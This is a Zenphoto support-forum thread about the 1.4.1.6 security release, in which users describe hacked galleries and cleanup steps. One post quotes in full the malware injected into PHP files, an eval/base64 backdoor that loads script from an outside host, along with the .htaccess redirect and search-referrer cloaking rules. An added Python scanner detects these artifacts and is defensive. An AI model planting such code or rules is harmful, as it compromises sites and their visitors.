Zenphoto 1.4.1.6 security update released

(31 posts)
  1. Zenphoto development team
    acrylian

    Developer
    Joined: Jul '07
    Posts: 15,225

    More info on:
    http://www.zenphoto.org/news/zenphoto-1.4.1.6

    Don't forget to read the Forum rules and usage resources
    Posted 2 years ago #
  2. hucste

    Contributor
    Joined: Jul '09
    Posts: 172

    Thanks to act as !
    It's very good thing...

    Posted 2 years ago #
  3. Ipstenu

    Contributor
    Joined: May '09
    Posts: 101

    Is there any difference to the manual changes I made yesterday for 1.4.1.5? (I use SVN to manage my install and I'm loath to download and change if I already took care of it by manually removing it).

    Posted 2 years ago #
  4. Zenphoto development team
    acrylian

    Developer
    Joined: Jul '07
    Posts: 15,225

    No, the 1.4.1.6 release (as noted on the post) just incorporates the changes mentioned on the 2nd security post. Otherwise it is just 1.4.1.5. Btw, that is mentioned in the release post's first sentence..;-)

    Again, note that the svn trunk is NOT 1.4.1.6 but already 1.4.2 beta (the dev svn stream as well), as the 1.4.1.x line was actually considered complete. This was announced a week or so ago.

    Posted 2 years ago #
  5. Zenphoto translation team
    Michel Gagnon

    Translator
    Joined: Apr '10
    Posts: 158

    A slightly different question: I have downloaded and installed the 1.4.3 DEV (8385) version and done the corrections you suggested in the "Security alert - Part 2 update 2". Am I OK?

    P.S. One site was hacked, the other was not, but I cleaned and updated both anyways.

    Posted 2 years ago #
  6. Zenphoto development team
    acrylian

    Developer
    Joined: Jul '07
    Posts: 15,225

    Yes, as far as we know. But I recommend using the TRUNK svn as that will become the next version 1.4.2. That is beta and will not get new features until the scheduled release (see roadmap on the bugtracker). Using this will help us find bugs we missed.

    The DEV svn is for 1.4.3 somewhere in the future. Currently both are still the same but soon this one might get experimental. So we can't recommend to use this on a live site currently.

    Posted 2 years ago #
  7. Zenphoto translation team
    mironb

    Translator
    Joined: Jan '08
    Posts: 73

    Hi
    My site was also hacked. I think it is now clean, but I didn't delete the jpg files with photos. How can I check whether they are infected?

    Posted 2 years ago #
  8. Zenphoto development team
    acrylian

    Developer
    Joined: Jul '07
    Posts: 15,225

    I would say try a virus scan for the start.

    Posted 2 years ago #
  9. oscardog

    Apprentice
    Joined: Nov '11
    Posts: 1

    After being affected by this loophole and clearing out the old install, when I come to upload (cPanel) the install package my host's system is rejecting the 1.4.1.6.zip saying it contains a virus (scanner is probably ClamAV).

    I cannot get any details as to which file it objects to.

    Has this been an issue for anyone else?

    Posted 2 years ago #
  10. BernardJL

    Apprentice
    Joined: Nov '11
    Posts: 3

    Maybe we are missing something here. Without the "ajax file manager" we cannot use the "Files" tab under "Upload".

    Which seems to mean the only way to add photos is via the web page upload.

    Is there some other way to get Zenphoto to process files we already have copied to the server? That has always been our preferred method to load pictures.

    Any help is appreciated.

    Posted 2 years ago #
  11. sbillard

    Contributor
    Joined: May '07
    Posts: 10,464

    The "Files" tab never provided a way to add photos to your gallery. It is just a way to upload files to your "uploaded" folder which you can then place as you wish on your pages through HTML.

    It is the "Images" tab that provided the means for uploading photos. It is still present and operational.

    Besides, there is always FTP to upload to your site. Zenphoto always processes images it finds in your albums folders.

    Posted 2 years ago #
  12. BernardJL

    Apprentice
    Joined: Nov '11
    Posts: 3

    SBillard, thanks for clearing that up for us. We are moving from another photo gallery to Zenphoto and are just getting used to the file structure of Zenphoto.

    Thanks so much for your quick response. It is really appreciated.

    Posted 2 years ago #
  13. sbillard

    Contributor
    Joined: May '07
    Posts: 10,464

    We are also working closely with the developer of ajaxfilemanager and hope to have a solution to the security issues soon.

    Posted 2 years ago #
  14. lkco

    Apprentice
    Joined: Nov '11
    Posts: 2

    Hi all,
    my site was hacked and I lost a lot of information :'( But I was able to find some information in the Apache logs.
    The hacker succeeded in downloading the [link removed by moderator] file and executing it. It mostly removes all files owned by apache.
    I hope this will help someone!

    Posted 2 years ago #
  15. Zenphoto development team
    fretzl

    Moderator
    Joined: Sep '08
    Posts: 730

    I removed the link to the zip file because I'm not sure if it's potentially dangerous.

    Posted 2 years ago #
  16. lkco

    Apprentice
    Joined: Nov '11
    Posts: 2

    Hi,
    I'm OK with this. So the zip contains no virus but PHP, Perl and SQL files. The PHP file is similar to ajaxterm. I think that my issue could help someone.
    If you want I can post the PHP file screenshot: http://tinypic.com/r/301ev89/5

    Posted 2 years ago #
  17. fotofill

    Apprentice
    Joined: Nov '11
    Posts: 2

    My site (fotofill.net) was hacked too. We rescanned the site, had the host do the same. I traced the IP and blocked any IP from Russia-Ukraine. It appears the hacker used tiny_mce to get access. I am pretty new to all this. Here is the message from my host:

    After further investigation, it appears that a hacker was able to inject malicious code into most (if not all) your php files by using the tiny_mce editor function from your Zenphoto installation.

    They suggested this:
    1). Update all scripts and plugins to remove vulnerabilities inherent in older versions.

    2). Scan the local system used to access this account for malware using the following software: MalwareBytes ( http://www.malwarebytes.org/ ) and ComboFix ( http://www.bleepingcomputer.com/combofix/how-to-use-combofix ). Many instances of compromised login details are due to local malware intercepting login details.

    We did that. We asked Google to scan the site also. Still waiting...
    My problem now is that my logins and passwords were wiped out at ZP and I cannot get in.

    Anything with fotofill.net in it is being blocked by browsers. Can someone help me get to my zp-core? Thanks

    Posted 2 years ago #
  18. sbillard

    Contributor
    Joined: May '07
    Posts: 10,464

    If the whole fotofill.net is blocked it is probably by your hosting company. That is a pretty standard response to this kind of attack. For instance my hoster did this. I had to use FTP to cleanse the site and then contact the hoster to have it unblocked.

    There is another thread with details on how to cleanse your site, but basically it involves removing all the site files and reloading from backup. Always, of course, do not restore the zenphoto files but obtain the fixed version and install that.

    Posted 2 years ago #
  19. Zenphoto development team
    acrylian

    Developer
    Joined: Jul '07
    Posts: 15,225

    The blocking of the site is not by the hosting company. It is blocked in the browser by using a warning database Google & Co provide that most browser vendors use.

    Sorry, you will have to wait until your site is rescanned and removed from that. On Google that might take a few days. You can of course ignore that warning and proceed. How to reset Zenphoto passwords is explained on our troubleshooting.

    Posted 2 years ago #
  20. LiechsWonder

    Member
    Joined: Nov '11
    Posts: 12

    Hello! I have 2 zenphoto galleries on my site and both of them got hit by the ajax bug so now I am trying to fix it (really annoying because I am in the middle of two large class projects). Based on what I have read on this post and the other couple related posts, this is what I have gathered the solution to fix it is:

    1. Delete ajax upload manager folder inside of zenphoto
    2. Install latest zenphoto release
    3. Go through all php and .htaccess files on the website to ensure they are clean

    Does that sound right? I am still new to zenphoto/website management in general and I want to be sure I don't do something stupid while trying to clean it up and lose the 7000+ images between my two galleries, lol.

    Thank you for your help!

    Posted 2 years ago #
  21. Zenphoto development team
    acrylian

    Developer
    Joined: Jul '07
    Posts: 15,225

    That is what we know so far by reports of users (as we ourselves were not hacked).

    Posted 2 years ago #
  22. LiechsWonder

    Member
    Joined: Nov '11
    Posts: 12

    Ok great. I will give that a shot then!

    I am enjoying Zenphoto thus far and thank you for your hard work on this. I am now following the RSS feed so I can get updates/security fixes faster (had I done that before I probably wouldn't be in this boat :P).

    Posted 2 years ago #
  23. haizhu

    Apprentice
    Joined: Jan '11
    Posts: 3

    I appear to also have been affected by this vulnerability. They had my Zenphoto domain redirecting to http://(hacker's URL).in/jaki/index.php as you can see below and also altered the .htaccess and php files for the other domains in my shared hosting account. The latter changes seem to have had no noticeable effect (the rest of the sites run on Drupal 6 or 7).

    Can anyone else who was hacked let me know if the hackers altered anything else on their systems that I should fix? I purged everything but the albums folder from my Zenphoto install and removed the added code from the *.php and .htaccess files on my other domains. Is there anything else I should do to set things right?

    For reference, the hackers added this to the top of all PHP files:

    global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } } else { if($_COOKIE[$sessdt_k]=="102") { $sessdt_f = (rand(1000,9000)+1); if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; $sessdt_v = urlencode(strrev($sessdt_j)); $sessdt_u = "http://turnitupnow.net/?rnd=".$sessdt_f.substr($sessdt_v,-200); echo "<script src='$sessdt_u'></script>"; echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--"; } } $sessdt_p = "showimg"; if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));exit;} }

    …and this to the end of all the .htaccess files:

    ErrorDocument 400 http://(hacker's URL).in/jaki/index.php
    ErrorDocument 401 http://(hacker's URL).in/jaki/index.php
    ErrorDocument 403 http://(hacker's URL).in/jaki/index.php
    ErrorDocument 404 http://(hacker's URL).in/jaki/index.php
    ErrorDocument 500 http://(hacker's URL).in/jaki/index.php

    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr)\.(.*)
    RewriteRule ^(.*)$ http://(hacker's URL).in/jaki/index.php [R=301,L]
    </IfModule>

    Thanks!

    Posted 2 years ago #
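A scanner for the two artifacts quoted in the post above, added here as an example (it is not code from the thread or from the Zenphoto project). It flags PHP files whose first 4 KB carry the `$sessdt_o` prefix and `.htaccess` files with off-site ErrorDocument/RewriteRule targets or the referrer cloaking condition; the 4 KB window, the `scan_tree` walker and the sample `.htaccess` with the placeholder host `redirect.example` are my assumptions.

```python
import re
import sys
from pathlib import Path

# Fragments of the injected PHP shown in the post; both must appear near the top.
PHP_MARKERS = ("$sessdt_o", "eval(base64_decode(")
# ErrorDocument or RewriteRule whose target is an absolute URL (off-site redirect).
HTACCESS_RE = re.compile(r"^\s*(?:ErrorDocument\s+\d{3}|RewriteRule\s+\S+)\s+https?://")
# Referrer test used to send only search-engine visitors to the redirect.
REFERER_RE = re.compile(r"RewriteCond\s+%\{HTTP_REFERER\}", re.I)

# Constructed sample (placeholder host), mirroring the shape of the quoted .htaccess tail.
SAMPLE_HTACCESS = """ErrorDocument 404 http://redirect.example/jaki/index.php
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|bing)\\.(.*)
RewriteRule ^(.*)$ http://redirect.example/jaki/index.php [R=301,L]
</IfModule>
"""

def php_is_infected(src: str) -> bool:
    """True when the injected snippet sits within the first 4 KB of a PHP file."""
    head = src[:4096]
    return all(marker in head for marker in PHP_MARKERS)

def htaccess_findings(src: str) -> list:
    """Return the suspicious .htaccess lines (off-site redirects, referrer cloaking)."""
    return [line.strip() for line in src.splitlines()
            if HTACCESS_RE.match(line) or REFERER_RE.search(line)]

def scan_tree(root: Path) -> dict:
    """Map each suspicious file (relative path) under root to a short reason."""
    hits = {}
    for path in root.rglob("*"):
        if not path.is_file():
            continue
        try:
            text = path.read_text(errors="replace")
        except OSError:
            continue  # unreadable file: skip rather than abort the scan
        rel = str(path.relative_to(root))
        if path.suffix == ".php" and php_is_infected(text):
            hits[rel] = "injected PHP prefix"
        elif path.name == ".htaccess" and htaccess_findings(text):
            hits[rel] = "; ".join(htaccess_findings(text))
    return hits

if __name__ == "__main__":
    for rel, why in sorted(scan_tree(Path(sys.argv[1] if len(sys.argv) > 1 else ".")).items()):
        print(f"{rel}: {why}")
```

Run it against a copy of the web root taken before cleanup so the list of touched files can be compared with the restored backup.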
  24. Zenphoto development team
    acrylian

    Developer
    Joined: Jul '07
    Posts: 15,225

    Here are several insights into the hacks by a user:
    http://www.zenphoto.org/support/topic.php?id=9951#post-58366

    Posted 2 years ago #
  25. formulae

    Member
    Joined: Nov '10
    Posts: 28

    I have had more than 2500 php files infected with the prefixed code
    (different referring domain)
    all my wordpress files, piwik, sigh

    Posted 2 years ago #
  26. puregraphx

    Apprentice
    Joined: Dec '10
    Posts: 3

    Also several of my websites that use ZP were hacked. I have recovered 1 website, but I'm having trouble with another one: I have deleted all web files and when I visit the url I keep being redirected, although the site is completely empty and all .htaccess files were deleted. So my question is, what part keeps redirecting??

    Posted 2 years ago #
  27. Zenphoto development team
    acrylian

    Developer
    Joined: Jul '07
    Posts: 15,225

    Please take a look at the forum topic linked above. I personally can't answer as we were not affected.

    Posted 2 years ago #
  28. ultgamewiz

    Apprentice
    Joined: Nov '11
    Posts: 3

    puregraphx : I just finished recovery from one of my zengallery installs. If you're still experiencing a redirection, chances are there is a shell access only directory above your FTP (this is the case for godaddy and all of their resellers). If you are a godaddy user, you'll need to enable SSH and use port 22 to find the master htaccess file for your shared hosting account (which isn't visible if you're just using FTP on port 21, only SFTP on port 22). I hope this helps.

    Posted 2 years ago #
  29. ultgamewiz

    Apprentice
    Joined: Nov '11
    Posts: 3

    Can anyone answer if the cache files need to be cleared before or after the upgrade to prevent the same security hole from allowing unauthorized users in? - I've noticed a lot of very long rss cache files (example: rss_ampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampamplang.xml)

    Is this normal activity for zengallery?

    Posted 2 years ago #
  30. Zenphoto development team
    acrylian

    Developer
    Joined: Jul '07
    Posts: 15,225

    I would recommend clearing all caches. It does not hurt as they are recreated on request anyway. It is unlikely that images contain hacked code but the cached html or rss files might (not php but hacked links or js code).

    No, such rss files are not normal, unless you have an album with that long name. Album rss feed files look like this:
    rss_Screenshots_screenshots_en_US.xml
    This is a cached feed of the screenshots subalbum of the Screenshots album (example from our own site). Language version is English which is the default and only one used on our site anyway.

    Posted 2 years ago #